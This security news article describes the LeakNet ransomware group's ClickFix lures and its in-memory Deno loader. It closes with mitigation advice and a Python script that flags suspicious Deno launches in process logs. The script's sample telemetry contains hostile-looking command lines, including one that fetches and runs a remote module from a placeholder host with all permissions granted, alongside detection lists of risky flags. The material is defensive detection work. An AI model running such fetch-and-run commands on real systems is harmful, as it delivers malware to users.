A ransomware group known as LeakNet has been observed using a social engineering tactic called ClickFix, delivered through hacked websites, to gain initial access to victim systems. This method represents a shift from the group’s previous reliance on stolen credentials and other traditional intrusion techniques.
The ClickFix tactic tricks users into executing malicious commands by hand. Victims browsing a compromised website are shown a fake error message that tells them to open their system's command prompt or terminal and run a specific command to supposedly fix the problem. Whoever complies runs the attacker's first-stage command under their own account: no software exploit is involved, because the user performs the download and execution that eventually delivers the ransomware.
Technical Execution and In-Memory Loading
Following the initial ClickFix compromise, the LeakNet operation deploys an in-memory loader built on the Deno JavaScript/TypeScript runtime. The loader keeps the malicious script in memory rather than writing it to disk, so traditional antivirus and endpoint tooling that scans files on the hard drive has nothing to match.
Deno is a legitimate developer runtime rather than a custom malware binary, and it can execute code fetched over the network or passed inline with deno eval instead of from a saved script file. That is what makes it attractive as a loader: what lands on disk is an ordinary runtime executable, not a malicious payload, which complicates detection for security teams. The loader then facilitates the final stage of the attack, deployment of the LeakNet ransomware, which encrypts the victim's files and demands payment for their decryption. "Fileless" applies to the payload, not to the runtime: the Deno executable, its command line, its parent process and its network connections are all visible to process-creation and network telemetry, which is where detection should concentrate.
Significance of the Attack Vector
This campaign highlights a concerning evolution in ransomware delivery methods. By combining a low-tech social engineering ploy with a high-tech, fileless loader, attackers are targeting the human element while simultaneously employing advanced evasion tactics. The compromise of legitimate websites to host the ClickFix lures increases the perceived legitimacy of the fake error messages, making the scam more convincing to potential victims.
Security analysts note that this approach reduces the attackers’ dependency on exploiting software vulnerabilities or purchasing access from initial access brokers. Instead, it directly manipulates user behavior, relying on a moment of confusion or urgency to bypass technical security controls.
Recommendations for Mitigation
Organizations and individuals are advised to exercise extreme caution when encountering unsolicited error messages or instructions to run commands, especially those presented on websites. Users should never run commands suggested by pop-up warnings or unfamiliar sites. Regular security awareness training is critical to help staff recognize such social engineering attempts.
From a technical standpoint, security teams should baseline where Deno legitimately runs in their environment and alert on deviations: Deno executing from user-writable locations such as Temp or Downloads, launched from a shell a user typed into rather than from developer tooling, or carrying a remote URL, inline eval code or broad permission flags such as -A or --allow-run on its command line. Application allowlisting, where feasible, should block script runtimes on hosts that have no developer use for them. Endpoint Detection and Response (EDR) solutions that record process creation, command lines and parent-child relationships, and that can monitor in-memory activity and suspicious process behaviour, are the controls that actually see this loader, since file scanning will not.
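As an added illustration of that monitoring advice (example code written for this page, not from the original research or from any vendor's detection rules), the following Python scores process-creation events for Deno launches that look like a ClickFix-delivered loader rather than developer activity. The key=value log format, the sample events, the list of "interactive" parent processes, the expected install locations and the point values are all assumptions constructed for the example; the Deno flags it looks for (-A, --allow-*, -q, --no-prompt, the run and eval subcommands) are real Deno CLI options.

```python
import re
from dataclasses import dataclass

# ---- constructed sample telemetry (not real LeakNet indicators) ----------
SAMPLE_LOG = [
    # 0. What the article describes: Deno dropped in Temp, launched from the
    #    shell the victim pasted into, pulling a remote module with every
    #    permission granted and all prompts/output suppressed.
    r'EventID=1 Image="C:\Users\victim\AppData\Local\Temp\deno.exe" CommandLine="deno.exe run -A -q --no-prompt https://cdn.example.invalid/loader.ts" ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    # 1. A developer running a project from VS Code: benign.
    r'EventID=1 Image="C:\Users\dev\.deno\bin\deno.exe" CommandLine="deno run --allow-net main.ts" ParentImage="C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"',
    # 2. Same developer running tests from a terminal: benign.
    r'EventID=1 Image="C:\Users\dev\.deno\bin\deno.exe" CommandLine="deno test" ParentImage="C:\Program Files\PowerShell\7\pwsh.exe"',
    # 3. Inline code via eval from cmd.exe: no script file is ever written.
    r'EventID=1 Image="C:\Users\victim\AppData\Roaming\deno.exe" CommandLine="deno.exe eval -A --no-prompt const r=await fetch(...)" ParentImage="C:\Windows\System32\cmd.exe"',
    # 4. Not Deno at all: ignored by this rule.
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe notes.txt" ParentImage="C:\Windows\explorer.exe"',
]

@dataclass
class ProcEvent:
    image: str      # path of the new process
    cmdline: str    # its full command line
    parent: str     # path of the parent process

KV_RE = re.compile(r'(\w+)="([^"]*)"')   # quoted key="value" pairs
ARG_RE = re.compile(r'"[^"]*"|\S+')       # command-line tokens, quotes kept
URL_RE = re.compile(r'^https?://', re.I)

# Parents that mean "a person pasted this into a shell", which is how ClickFix
# delivers its command. IDEs and build tools are deliberately absent.
# Assumption for this example; tune to your fleet.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "mshta.exe", "wscript.exe", "cscript.exe", "conhost.exe"}

# Real Deno flags that hand the script broad capabilities ...
HIGH_RISK_PERMS = ("-A", "--allow-all", "--allow-run", "--allow-ffi", "--allow-write")
# ... and real flags that keep the run silent and non-interactive for the victim.
SILENT_FLAGS = ("-q", "--quiet", "--no-prompt")

# Where an installed Deno normally lives; anything else (Temp, Roaming,
# Downloads) suggests the lure command dropped it. Assumption for this example.
EXPECTED_INSTALL_FRAGMENTS = (".deno/bin/", "program files", "/usr/local/bin/",
                              "/usr/bin/", "/opt/homebrew/", "scoop/", "chocolatey/")

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_event(line: str) -> ProcEvent:
    fields = dict(KV_RE.findall(line))
    return ProcEvent(fields.get("Image", ""), fields.get("CommandLine", ""),
                     fields.get("ParentImage", ""))

def score_event(ev: ProcEvent):
    """Return (score, reasons). Only Deno launches are scored; anything else is 0."""
    if basename(ev.image) not in ("deno.exe", "deno"):
        return 0, []
    args = [a.strip('"') for a in ARG_RE.findall(ev.cmdline)]
    sub = args[1] if len(args) > 1 else ""
    hits = []
    if any(URL_RE.match(a) for a in args):
        hits.append((3, "module loaded straight from a remote URL"))
    if sub == "eval":
        hits.append((2, "inline code via 'deno eval', no script file on disk"))
    if any(a.split("=")[0] in HIGH_RISK_PERMS for a in args):
        hits.append((2, "broad permissions granted (-A / --allow-run / ...)"))
    elif any(a.startswith("--allow-") for a in args):
        hits.append((1, "scoped permissions granted"))
    if any(a in SILENT_FLAGS for a in args):
        hits.append((1, "quiet / no-prompt run hides activity from the user"))
    if basename(ev.parent) in INTERACTIVE_PARENTS:
        hits.append((2, f"launched from interactive shell {basename(ev.parent)}"))
    norm = ev.image.replace("\\", "/").lower()
    if not any(frag in norm for frag in EXPECTED_INSTALL_FRAGMENTS):
        hits.append((1, "deno binary outside a normal install location"))
    return sum(p for p, _ in hits), [r for _, r in hits]

def scan(lines, threshold: int = 6):
    """Score every event and return those at or above the alert threshold."""
    alerts = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"index": i, "score": score,
                           "cmdline": ev.cmdline, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a['score']}] {a['cmdline']}")
        for r in a["reasons"]:
            print("    -", r)
```

Run stand-alone, it alerts on events 0 and 3 and stays quiet on the developer's runs. The threshold of 6 is chosen so that a remote module plus broad permissions plus an interactive parent, the combination a pasted ClickFix command produces, always alerts, while a developer running a URL-hosted script with -A from an IDE (score 5) does not; adjust the weights to your own baseline rather than treating them as fixed.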
Looking ahead, security researchers anticipate that other ransomware groups may adopt similar hybrid tactics, blending simple deception with advanced technical execution. The continued monitoring of compromised websites for such lures, along with increased industry collaboration to share indicators of compromise, will be essential in disrupting this emerging threat pattern.
Source: Original security research reports